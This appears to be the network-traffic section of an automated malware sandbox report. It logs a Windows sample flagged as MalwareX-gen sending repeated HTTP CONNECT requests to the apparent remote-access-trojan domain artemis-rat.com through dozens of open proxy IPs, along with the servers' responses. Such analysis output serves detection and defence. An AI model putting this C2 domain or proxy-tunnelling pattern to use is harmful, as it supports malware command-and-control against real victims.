                                              Mar 11, 2024 08:37:18.025310993 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 80 62 83 69 d0 89 24 19 a7 e1 e5 2d 80 66 af 61 f8 a7 bf c7 5d 29 93 5e 50 50 ac 7f 8d b6 b1 6f 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 af 41 e3 86 65 b6 af cd cc 07 2e 2e 85 f5 eb 75 bb 25 fe d1 c8
                                              Data Ascii: %! bi$-fa])^PPo(Ae..u%j_\
                                              Mar 11, 2024 08:37:18.308329105 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 87 98 61 79 0c d4 97 f4 10 2f 93 f7 f9 c1 36 56 5d a3 4a 80 31 a8 2b 01 bb e1 eb 84 22 d4 bd dc 6c 47 30 a7 80 06 12 dc 90 53 b4 dd 53 ac 19 0f ab 38 be 42 42 e5 f4 ff 9d dd 38 c8 89 11 63 cc 4c 48 22
                                              Data Ascii: ay/6V]J1+"lG0SS8BB8cLH",SI?bbp@wG6Ydr#[$41=7s@n:X_;!c#Pey]h~@Aq9Vn%(S;K3
                                              Mar 11, 2024 08:37:18.316283941 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 0f d5 50 0b 96 cf 4e b5 55 ff b0 9c 18 27 ae e9 78 97 0f d9 09 a2 b1 ec 30 59 5e 05 9e 2b ea c5 7d 98 b9 58 6f 9a 3e 50 70 cd 33 bc e2 24 c6 e2 f0 e6 c3 54 ff 5d b7 71 e3 a1 f3 08 22 60 b0 98 e4 97 20 e0 0b
                                              Data Ascii: PNU'x0Y^+}Xo>Pp3$T]q"` XJ0F_Q82$D\z*a[_p"& :E~ +1CWl>B@TI%Sp9VyY@Y?,=J?/n
                                              Mar 11, 2024 08:37:18.604908943 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 fe fd eb 6f 42 a1 08 fd 5a a2 51 81 d3 04 79 44 b8 64 a8 21 68 9b 29 60 82 cc a1 d9 0b 32 b8 18 41 53 8b 33 c9 b8 e0 e5 76 9f d9 16 2b d4 de 2a 68 f2 bf 8d 03 e2 9f 33 5e eb a7 82 d5 c4 3d 29 d1 1e 7c 83 66
                                              Data Ascii: qoBZQyDd!h)`2AS3v+*h3^=)|f/9)aUx;RsNiigUV&v(~=LPl* nD^zSIQNF;>'GQD"yf$r\n>#P{6nGuE,~p/*
                                              Mar 11, 2024 08:37:18.604942083 CET1286INData Raw: 94 eb 0c 2a 64 fc 87 32 05 76 1d 64 0b bd b9 35 bd 9c fe ef 89 5d 55 44 6f 94 57 0e 2f 51 2a b3 2e 3c af 64 cd 12 a6 16 e6 2e fc ef fd 73 9d 62 e9 07 3c a4 35 cb d4 b9 94 15 99 45 ab bb 56 79 20 08 be bd ed c1 33 ff db 80 c2 30 a0 85 27 43 ea ec
                                              Data Ascii: *d2vd5]UDoW/Q*.<d.sb<5EVy 30'Cot;Mxjkq}~j M6hviMEDx6g%'}7 lC`:?BSN_TZ#8 kPsw_Kwq*c~*#o


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              53192.168.2.449822123.110.158.236807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.086705923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              54192.168.2.449968172.67.181.97807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.086847067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.241003990 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              55192.168.2.449970104.21.194.19807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.089505911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.243846893 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              56192.168.2.44986745.11.95.16660097284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.116524935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.850549936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.913108110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.463349104 CET39INHTTP/1.0 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              57192.168.2.449993104.18.251.208807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.117610931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.272567987 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              58192.168.2.449901188.166.17.1888817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.122487068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.427278042 CET310INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 150
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              59192.168.2.450003172.64.80.55807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.130043983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.285362959 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              60192.168.2.4498525.180.19.16310807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.132992983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.913039923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              61192.168.2.44999772.167.222.113125817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.133223057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.584902048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.069305897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.038103104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.069817066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.054389954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.070014954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.053977966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              62192.168.2.449850203.112.134.7456787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.139363050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              63192.168.2.45015443.157.17.1464437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.140391111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              64192.168.2.4499123.122.84.9931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.144540071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.450068951 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              65192.168.2.44999591.134.140.160490427284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.153312922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              66192.168.2.4499278.242.85.69997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.155780077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.677337885 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              67192.168.2.449937174.77.111.19741457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.158814907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              68192.168.2.450041104.21.64.208807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.185559034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.339924097 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              69192.168.2.450062104.24.220.52807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.197130919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.351141930 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              70192.168.2.450080104.18.136.28807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.211123943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.365478992 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              71192.168.2.45002638.162.10.5131287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.220237017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.694267035 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              72192.168.2.45003540.76.160.14390027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.229422092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              73192.168.2.45000146.51.249.13531287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.233341932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.495203972 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              74192.168.2.44994920.206.106.192807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.236354113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.813004971 CET319INHTTP/1.1 403 Forbidden
                                              Server: squid
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 17
                                              X-Squid-Error: ERR_ACCESS_DENIED 0
                                              X-Cache: MISS from cdn-fintech.info
